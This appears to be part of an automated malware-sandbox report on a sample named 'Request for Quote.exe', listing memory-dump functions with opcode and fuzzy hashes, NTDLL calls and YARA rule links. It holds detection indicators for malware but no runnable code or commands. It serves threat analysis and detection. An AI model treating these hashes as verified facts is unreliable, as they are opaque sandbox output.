Opcode ID: 1299117ecbad54f37637c7ffe8f46fe1c41382f42ea15619f014ab3b94f94817
Instruction ID: b31bc0882a2a98017ccb75979e14ddfa61eade11f43593cd9ed85e3520b1549d
Opcode Fuzzy Hash: 1299117ecbad54f37637c7ffe8f46fe1c41382f42ea15619f014ab3b94f94817
Instruction Fuzzy Hash: 91D1EB707012059FEB69EB7AC8507AEB7F6AF88300F14846DD546CB6A0DF35E901CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0AB9782E, Relevance: 1.5, Strings: 1, Instructions: 212COMMON

Download Yara Rule

Strings

,, xrefs: 0AB97B86

Memory Dump Source

Source File: 00000000.00000002.255766157.000000000AB90000.00000040.00000001.sdmp, Offset: 0AB90000, based on PE: false

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 1d82f7b792381a6e92f0823206a3b15d0fcd3b1927ca3ce3ca1f9318b1bd714a
Instruction ID: 12cd029feaee2ee1b984ef6b0978b8e2200c4dc33d4eada43ceea2a32388374a
Opcode Fuzzy Hash: 1d82f7b792381a6e92f0823206a3b15d0fcd3b1927ca3ce3ca1f9318b1bd714a
Instruction Fuzzy Hash: D0B18EB0E10A688FDB64DF69D9807CDBBF1EB49301F5081E9D548B6206EB30AA95CF44

Uniqueness

Uniqueness Score: -1.00%

Function 02593EA0, Relevance: 1.4, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

p^UF, xrefs: 025940B8

Memory Dump Source

Source File: 00000000.00000002.249071901.0000000002590000.00000040.00000001.sdmp, Offset: 02590000, based on PE: false

Similarity

API ID:
String ID: p^UF
API String ID: 0-1948922254
Opcode ID: 1f3aca1d461b29e9074789b93d5de825373a0f72d85f4d85b9a22a98055118ab
Instruction ID: d1fa62dec618ad721eb321354c07455cee3be65136fb56142806b22b79f68a5c
Opcode Fuzzy Hash: 1f3aca1d461b29e9074789b93d5de825373a0f72d85f4d85b9a22a98055118ab
Instruction Fuzzy Hash: 8181E074E15219DFCB04CFA9C5849AEFBF2FF88210F15956AE419AB320D335AA42CF54

Uniqueness

Uniqueness Score: -1.00%

Function 02593E90, Relevance: 1.4, Strings: 1, Instructions: 180COMMON

Download Yara Rule

Strings

p^UF, xrefs: 025940B8

Memory Dump Source

Source File: 00000000.00000002.249071901.0000000002590000.00000040.00000001.sdmp, Offset: 02590000, based on PE: false

Similarity

API ID:
String ID: p^UF
API String ID: 0-1948922254
Opcode ID: ce1eb78a59d0869b70bb219d98c8a19c5504599d804f6261b1d4adaf8e4dea9f
Instruction ID: 5b21387745427e0d95cac49fb8523be5f33e155411f35aa0c1794d2ea5f04ec9
Opcode Fuzzy Hash: ce1eb78a59d0869b70bb219d98c8a19c5504599d804f6261b1d4adaf8e4dea9f
Instruction Fuzzy Hash: 7281F334A15219DFCB04CFA9C58499EFBF1FF88210F1599AAE415AB320D334AA42CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0AB93E88, Relevance: 1.0, Instructions: 1009COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.255766157.000000000AB90000.00000040.00000001.sdmp, Offset: 0AB90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6266618c5c11ffc3ac3265523fd27d2a9cda396c07a17ed20e02609c6e85dd2
Instruction ID: f8154db7a0f5cf4a83dd6f18d320383073be310eaef4ba8cc0a31666b2a78d15
Opcode Fuzzy Hash: d6266618c5c11ffc3ac3265523fd27d2a9cda396c07a17ed20e02609c6e85dd2
Instruction Fuzzy Hash: 37924B34A146459FCF24CF68D584AAEBBF2FF88314F1685A9E4099B2A1D731EC42DF50

Uniqueness

Uniqueness Score: -1.00%

Function 0AB9C3F0, Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.255766157.000000000AB90000.00000040.00000001.sdmp, Offset: 0AB90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7be90a0d7c9557491f338a07df1e1c3019baa977b27fb2ceedfffe7152e465e
Instruction ID: f3e1ad05b3c492eadca8d53416164bf86141974f7a9e574d887fd24fcd9fc6e0
Opcode Fuzzy Hash: c7be90a0d7c9557491f338a07df1e1c3019baa977b27fb2ceedfffe7152e465e
Instruction Fuzzy Hash: ACA1E2B4E042598FDB14CFA9C585AADFFF2BF4A304F2481A9D408AB355EB349981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02595308, Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249071901.0000000002590000.00000040.00000001.sdmp, Offset: 02590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08a4ff67a717b741df1a64244d15b62329a5b30cc753a98a53ccc205a4180b11
Instruction ID: ddc1d55d98c4fdd277ff8693afa2dbe36164eb7abcdddbe624a80ea3db2ff811
Opcode Fuzzy Hash: 08a4ff67a717b741df1a64244d15b62329a5b30cc753a98a53ccc205a4180b11
Instruction Fuzzy Hash: 4D61F374E152098FCF04CFAAC5809DEFBF2FF89210F68942AD455B7224E3749A51CB68

Uniqueness

Uniqueness Score: -1.00%

Function 02595318, Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249071901.0000000002590000.00000040.00000001.sdmp, Offset: 02590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18979a129ebe72f82c1711abf2b4fe6e1a4dd5b4a6d9fdd98da6d0d930841988
Instruction ID: ca81c61249bffb4a2cbb3a9714bf3beba82c9290ae44df120bc73713aed3ea66
Opcode Fuzzy Hash: 18979a129ebe72f82c1711abf2b4fe6e1a4dd5b4a6d9fdd98da6d0d930841988
Instruction Fuzzy Hash: F271E174E152098FCF04CFAAD5809DEFBF2BB89210F68942AD455BB214E3749A51CB68

Uniqueness

Uniqueness Score: -1.00%

Function 02594A60, Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249071901.0000000002590000.00000040.00000001.sdmp, Offset: 02590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ce939c49c6e227b95e982751af2ae56ed060b04b34eed9c7f6e5ffbc176c8e3
Instruction ID: 407c21572b4742459969408a55bc17e72a51b6a5ba803d66e9512d63c01b0f11
Opcode Fuzzy Hash: 6ce939c49c6e227b95e982751af2ae56ed060b04b34eed9c7f6e5ffbc176c8e3
Instruction Fuzzy Hash: 8671E1B4E1520ADFCF04CF99D4809AEFBB2FF89310F14955AD415AB214D734A982CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 02594A50, Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249071901.0000000002590000.00000040.00000001.sdmp, Offset: 02590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c44be130d5f9979ea546bf2169fc3863c2d0834c1508f6f94e6fdfa8c4820a2a
Instruction ID: a98f72cedcec75944f45fdfb1aaab2b54188d64ed0a026a8e6d66736ed3b8412
Opcode Fuzzy Hash: c44be130d5f9979ea546bf2169fc3863c2d0834c1508f6f94e6fdfa8c4820a2a
Instruction Fuzzy Hash: C061E3B4E1420ADFCF04CFA9D4809AEFBB2FF89310F15955AD415A7214D734A982CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0AB95DD8, Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.255766157.000000000AB90000.00000040.00000001.sdmp, Offset: 0AB90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ebf6bc520886a8bc7a84a77da104d3e12fc38157a4e74ff9d59346f6ea70c75
Instruction ID: f7087e274e588f3f0588dcc86eb211fa904626c180d054084674d609f04013cf
Opcode Fuzzy Hash: 8ebf6bc520886a8bc7a84a77da104d3e12fc38157a4e74ff9d59346f6ea70c75
Instruction Fuzzy Hash: FC512A71A05248CFD744DF7AE481A9EBBF2EF84308F048479D109AF264EF769916CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0A984BB0, Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bd7776934b2dceda680a31cc62be6630aedfd632f8240fb2fe74e68f90988bf
Instruction ID: cf50d4c863ca875783abbe12ec34ad8061b4c46a1fad8d7d1446522b8b0dfe09
Opcode Fuzzy Hash: 0bd7776934b2dceda680a31cc62be6630aedfd632f8240fb2fe74e68f90988bf
Instruction Fuzzy Hash: 42615CB0E0425A9FDB14DF65D980AAEFBF2BF89304F24C1AAD409A7355D7309942CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0A984BC0, Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88ac64687f9071388d29bdb6fd2071025bc3525b592b2085d86fed7c6367f03d
Instruction ID: 7e2f370c55829a574d60922f62073e2f2474b60098111bc2a7ab2a9653ca3e52
Opcode Fuzzy Hash: 88ac64687f9071388d29bdb6fd2071025bc3525b592b2085d86fed7c6367f03d
Instruction Fuzzy Hash: 1C615CB0E0421A9FDB14DFA9D980AAEFBF2BF88304F14C1A9D509A7355D7309942CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0AB95DE8, Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.255766157.000000000AB90000.00000040.00000001.sdmp, Offset: 0AB90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82f8f17aa01a41920021a3a03908b4ab58031c4d97af9a20b330b30c2c22509a
Instruction ID: 7e0bfcd4711125538fe4b7330390b4492c13b800e3736512a4cc27c75a90589a
Opcode Fuzzy Hash: 82f8f17aa01a41920021a3a03908b4ab58031c4d97af9a20b330b30c2c22509a
Instruction Fuzzy Hash: BB512871A05248CFDB44EF7AE481A9EBBF2AF84308F048479D109AF364EF759915CB91

Uniqueness

Uniqueness Score: -1.00%

Function 025950B9, Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249071901.0000000002590000.00000040.00000001.sdmp, Offset: 02590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc6906efbac0240da0e4bf4378492ff3ddf22938ea3e9fe27275e553b71d73e5
Instruction ID: c5098e2bbdbc156a571adb9962689518b24757dfa2242dd2f3882d68b8f480ec
Opcode Fuzzy Hash: bc6906efbac0240da0e4bf4378492ff3ddf22938ea3e9fe27275e553b71d73e5
Instruction Fuzzy Hash: 0B511874E1420A9FCF09CFAAC5815AEFBF2BF89300F64D46AC415A7254E3349A51CF98

Uniqueness

Uniqueness Score: -1.00%

Function 025950C8, Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249071901.0000000002590000.00000040.00000001.sdmp, Offset: 02590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 778ea2a6fb6bfe785bead6945fca94a54e050758292401928edca4a64617aed4
Instruction ID: c633e5f8d97509c40ef35b3fbcc1a7b81768a9f3d198aa6e86b6b5f8ad046d6e
Opcode Fuzzy Hash: 778ea2a6fb6bfe785bead6945fca94a54e050758292401928edca4a64617aed4
Instruction Fuzzy Hash: D65108B0E1420A9FCF44CFA6C5815AEFBF2BF89300F64D46AC415A7254E7349A51CF98

Uniqueness

Uniqueness Score: -1.00%

Function 02595798, Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249071901.0000000002590000.00000040.00000001.sdmp, Offset: 02590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e36453f6a35886536f2e28216992c2c0a528ecc9081f0d3166d024d9a7379fd6
Instruction ID: a35dd39dcc0e16dafd4af055c080005955376b9d0caa142ea8f4ba183d4384e9
Opcode Fuzzy Hash: e36453f6a35886536f2e28216992c2c0a528ecc9081f0d3166d024d9a7379fd6
Instruction Fuzzy Hash: B4414D71E156188BDB18CF6B9D4439EFBF3BFC9301F14C1BA850CA6225EB340A868E55

Uniqueness

Uniqueness Score: -1.00%

Function 045D0006, Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.251394511.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ec125e12b53a2184f4d1205525564b828f27dcb01f15feeb095d7bf10c79195
Instruction ID: e978a84a91f4945d51b132cf620505283b71232e1ba4f43cca3522fbe55a5571
Opcode Fuzzy Hash: 3ec125e12b53a2184f4d1205525564b828f27dcb01f15feeb095d7bf10c79195
Instruction Fuzzy Hash: 0D211E71D097989FE72ACF268C14299BFB2AFCA204F09C0FAC4489A166D6341945DF55

Uniqueness

Uniqueness Score: -1.00%

Function 025904D2, Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249071901.0000000002590000.00000040.00000001.sdmp, Offset: 02590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d854b1979887f99286064c447486a4eb6d675751198d514bf44696dea4bafaea
Instruction ID: 1a1c29b19d262b739a04b77420be63a5fb657f88f9585e1944b7ad51fcd13a88
Opcode Fuzzy Hash: d854b1979887f99286064c447486a4eb6d675751198d514bf44696dea4bafaea
Instruction Fuzzy Hash: 34211D71E046188BEB08CFAB98106DEFBF3BFC9210F18C47AC908A6264DB3406568F15

Uniqueness

Uniqueness Score: -1.00%

Function 0A9842F0, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d38c5cedbd7cc264a622149b9242e9e4435c7e258ad3b4645a6a430a989095c0
Instruction ID: cb111ac5e7031e5a1c8b5f880fe395ad9b902c64b16a4fdea73a4be8ae874869
Opcode Fuzzy Hash: d38c5cedbd7cc264a622149b9242e9e4435c7e258ad3b4645a6a430a989095c0
Instruction Fuzzy Hash: B22106B1E156599BDB08CFABD9406AEFBF7AFC9200F14C16AD408A7255EB304A028B51

Uniqueness

Uniqueness Score: -1.00%

Function 045D0040, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.251394511.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f79b28be0bb4eba6852600b94dcc51a6b56752544e09aea350dadd989829df3
Instruction ID: f50315c34513a10e9b5d28025f798537929524191a88696aa77c5faa99477c1d
Opcode Fuzzy Hash: 0f79b28be0bb4eba6852600b94dcc51a6b56752544e09aea350dadd989829df3
Instruction Fuzzy Hash: 5621BC71D456298BEB38CF6BCC0479EBAF2BFC9704F04C5BA841CA6255EB341A859E40

Uniqueness

Uniqueness Score: -1.00%

Function 0A984300, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95ba6058e5640cd5eec790c84881f7dfb5b338c310816989b6a514e57c4077bf
Instruction ID: 4321bc879f41a7752c4e171dcd4159a354807f07121614fee8617f15bcf449e8
Opcode Fuzzy Hash: 95ba6058e5640cd5eec790c84881f7dfb5b338c310816989b6a514e57c4077bf
Instruction Fuzzy Hash: 1D2106B1E116199BDB18CFABD9406AEFBF7BFC8210F14C17AD508A7214EB305A018F51

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Request for Quote.exe PID: 6376 Parent PID: 2260 Request for Quote.exeCOMMON

Executed Functions

Function 01410A76, Relevance: 7.0, APIs: 4, Instructions: 984libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 01410DDC
KiUserExceptionDispatcher.NTDLL ref: 014112A4
KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID:
API String ID: 2638914809-0
Opcode ID: eefb67bc92afdf03dc0312761671d390ca29d9e13bffb4fc77411205c434e044
Instruction ID: c3d38c677a0c0f2afee8f4b41a1bdacddb6477651d3314e9536849e6f7744338
Opcode Fuzzy Hash: eefb67bc92afdf03dc0312761671d390ca29d9e13bffb4fc77411205c434e044
Instruction Fuzzy Hash: ACA21474A01228CFCB64EF34C9586ADB7B6AF89205F5084EAD60AA3754DF349EC1CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01410A97, Relevance: 6.6, APIs: 4, Instructions: 637libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 01410DDC
KiUserExceptionDispatcher.NTDLL ref: 014112A4
KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID:
API String ID: 2638914809-0
Opcode ID: 8f228a0169da5fb91c0b0a516de43188d8ece1669e8f4017c68c441266405ca9
Instruction ID: c8d05704f0a08638c012df33983fd1866fa1a845e9beef7b68840a0bb2cffc23
Opcode Fuzzy Hash: 8f228a0169da5fb91c0b0a516de43188d8ece1669e8f4017c68c441266405ca9
Instruction Fuzzy Hash: B7620474A01228CFCBA4EF24D96869DB7B6BF89205F5084EAD609A3754CF349EC1CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01410ADC, Relevance: 6.6, APIs: 4, Instructions: 630libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 01410DDC
KiUserExceptionDispatcher.NTDLL ref: 014112A4
KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID:
API String ID: 2638914809-0
Opcode ID: ebb256e862bcc411abfa9ce69b6a150fc884a7c06cdd97e12d652c042e7202b8
Instruction ID: e9cbd70558f086b3f2430d372c92dd1b6ea1855adc303f85cd209db9a0a7e295
Opcode Fuzzy Hash: ebb256e862bcc411abfa9ce69b6a150fc884a7c06cdd97e12d652c042e7202b8
Instruction Fuzzy Hash: C9520474A01228CFCBA4EF24D96869DB7B6BF89205F5084EAD609A3754CF349EC1CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01410B21, Relevance: 6.6, APIs: 4, Instructions: 623libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 01410DDC
KiUserExceptionDispatcher.NTDLL ref: 014112A4
KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID:
API String ID: 2638914809-0
Opcode ID: a1efd770ee85a46def50009d36236e339181d736574548f1f885bd9c4a93fd77
Instruction ID: cac5453817363e7fd217f4691621a146e3b07d60d12c7772d09302cb4a1b64c3
Opcode Fuzzy Hash: a1efd770ee85a46def50009d36236e339181d736574548f1f885bd9c4a93fd77
Instruction Fuzzy Hash: 64520474A01228CFCBA4EF24D96869DB7B6BF89205F5084EAD609A3754CF349EC1CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01410B66, Relevance: 6.6, APIs: 4, Instructions: 616libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 01410DDC
KiUserExceptionDispatcher.NTDLL ref: 014112A4
KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID:
API String ID: 2638914809-0
Opcode ID: 6794ed04fe6c03b59bcb1ed0c7ffb4e6878982a144d9efd6ade5c46b1d910145
Instruction ID: 30d5f0b3f71f48915e1e63def5e02f35fda79f506982d3af961402182800afce
Opcode Fuzzy Hash: 6794ed04fe6c03b59bcb1ed0c7ffb4e6878982a144d9efd6ade5c46b1d910145
Instruction Fuzzy Hash: 0A521474A01228CFCBA4EB34D96869DB7B6BF89205F5084EAD609A3754CF349EC1CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01410BAB, Relevance: 6.6, APIs: 4, Instructions: 609libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 01410DDC
KiUserExceptionDispatcher.NTDLL ref: 014112A4
KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID:
API String ID: 2638914809-0
Opcode ID: 531b018ab765fc569b977b6b385e489308223af0330121490b3d43d1cb983f76
Instruction ID: 6a195fd5fd4a54b7b4a4da6abc58b5e30277e7ce0c1ab68c151ba17df34638c2
Opcode Fuzzy Hash: 531b018ab765fc569b977b6b385e489308223af0330121490b3d43d1cb983f76
Instruction Fuzzy Hash: 4B521474A01228CFCBA4EB34D96869DB7B6BF89205F5084EAD609A3754CF349EC1CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01410BF0, Relevance: 6.6, APIs: 4, Instructions: 602libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 01410DDC
KiUserExceptionDispatcher.NTDLL ref: 014112A4
KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID:
API String ID: 2638914809-0
Opcode ID: d4d521562b696a1acf5d03238cfb004b9bdee64c9cce60c732369226ef05a2ab
Instruction ID: 6cf1bfadcbf7ac146ae738da9dc23578367ad4228d5c82aa6056a578bb61ea4a
Opcode Fuzzy Hash: d4d521562b696a1acf5d03238cfb004b9bdee64c9cce60c732369226ef05a2ab
Instruction Fuzzy Hash: 87521574A01228CFCBA4EB34D95869DB7B6BF89205F5084EAD609A3754CF349EC1CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01410C35, Relevance: 6.6, APIs: 4, Instructions: 595libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 01410DDC
KiUserExceptionDispatcher.NTDLL ref: 014112A4
KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID:
API String ID: 2638914809-0
Opcode ID: 238cf4f3e8c90684de9995f2dd0b96d0ec6e0d3c047494df4ad04d08e78c2a01
Instruction ID: 357033a4952309270bdb9545eb785a084f21348d42bf018bd6bf9d5d5f6710f1
Opcode Fuzzy Hash: 238cf4f3e8c90684de9995f2dd0b96d0ec6e0d3c047494df4ad04d08e78c2a01
Instruction Fuzzy Hash: D5521574A01228CFCBA4EB34D9586ADB7B6BF89205F5084EAD609A3754CF349EC1CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01410C7A, Relevance: 6.6, APIs: 4, Instructions: 586libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 01410DDC
KiUserExceptionDispatcher.NTDLL ref: 014112A4
KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID:
API String ID: 2638914809-0
Opcode ID: f503bc24c65fc4c52af7ce5e18a48b03b8ae799ad14e7751a90a3febd9211e93
Instruction ID: af0ecb9232252beebc4a1b7e47989d3dfb9e9c96b2b023396403af88f2145725
Opcode Fuzzy Hash: f503bc24c65fc4c52af7ce5e18a48b03b8ae799ad14e7751a90a3febd9211e93
Instruction Fuzzy Hash: C7522574A01228CFCBA4EB34D9586ADB7B6BF89205F5084EAD609A3744CF349EC1CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01410CB6, Relevance: 6.6, APIs: 4, Instructions: 581libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 01410DDC
KiUserExceptionDispatcher.NTDLL ref: 014112A4
KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID:
API String ID: 2638914809-0
Opcode ID: c691fc2d6074362e13dbfb8c500976217100521db9b7739e788b6a343bbdea96
Instruction ID: 657adf01ea939b40dd7506e0e80095bb713db5c051bde86c6d76511cfb87c504
Opcode Fuzzy Hash: c691fc2d6074362e13dbfb8c500976217100521db9b7739e788b6a343bbdea96
Instruction Fuzzy Hash: 95422574A01228CFCBA4EB34D95869DB7B6BF89205F5084EAD609A3744CF349EC1CF55

Uniqueness

Uniqueness Score: -1.00%

Function 01410CFB, Relevance: 6.6, APIs: 4, Instructions: 572libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 01410DDC
KiUserExceptionDispatcher.NTDLL ref: 014112A4
KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID:
API String ID: 2638914809-0
Opcode ID: 974d43c6ef6d4b08dcc885e97ac845741c248624cc32601b0284136e1f810837
Instruction ID: c026764a8220a987e12288dedbb5aa7c8b06016c06b25449ba2e089efbb25a85
Opcode Fuzzy Hash: 974d43c6ef6d4b08dcc885e97ac845741c248624cc32601b0284136e1f810837
Instruction Fuzzy Hash: 1A422574A01228CFCBA4EB34C95869DB7B6BF89205F5084EAD609A3744CF349EC1CF55

Uniqueness

Uniqueness Score: -1.00%

Function 01410D37, Relevance: 6.6, APIs: 4, Instructions: 567libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 01410DDC
KiUserExceptionDispatcher.NTDLL ref: 014112A4
KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID:
API String ID: 2638914809-0
Opcode ID: d6d74ee818d4d745ea3b88c371cf937e944d7e7bfabb31af361c58f6a4431f1e
Instruction ID: fc34f5f615103c468f06e516022f6df2508939a6bed027ada4dd918c30cb46b9
Opcode Fuzzy Hash: d6d74ee818d4d745ea3b88c371cf937e944d7e7bfabb31af361c58f6a4431f1e
Instruction Fuzzy Hash: FA421574A01228CFCBA4EB34D9586ADB7B6BF89205F5084EAD609A3744CF349EC1CF55

Uniqueness

Uniqueness Score: -1.00%

Function 01410D7C, Relevance: 6.6, APIs: 4, Instructions: 558libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 01410DDC
KiUserExceptionDispatcher.NTDLL ref: 014112A4
KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID:
API String ID: 2638914809-0
Opcode ID: 69e12275d8489b8733b9e300ce27942b252d61edcf84b104cf500128780026c9
Instruction ID: 4132f0a0fd14acd6a461408e011711306547cf44bc472c231a26623e18d41f9a
Opcode Fuzzy Hash: 69e12275d8489b8733b9e300ce27942b252d61edcf84b104cf500128780026c9
Instruction Fuzzy Hash: F8421574A01228CFCBA4EB34D9586ADB7B6BF89205F5084EAD609A3744CF349EC1CF55

Uniqueness

Uniqueness Score: -1.00%

Function 01410DB8, Relevance: 6.6, APIs: 4, Instructions: 553libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 01410DDC
KiUserExceptionDispatcher.NTDLL ref: 014112A4
KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID:
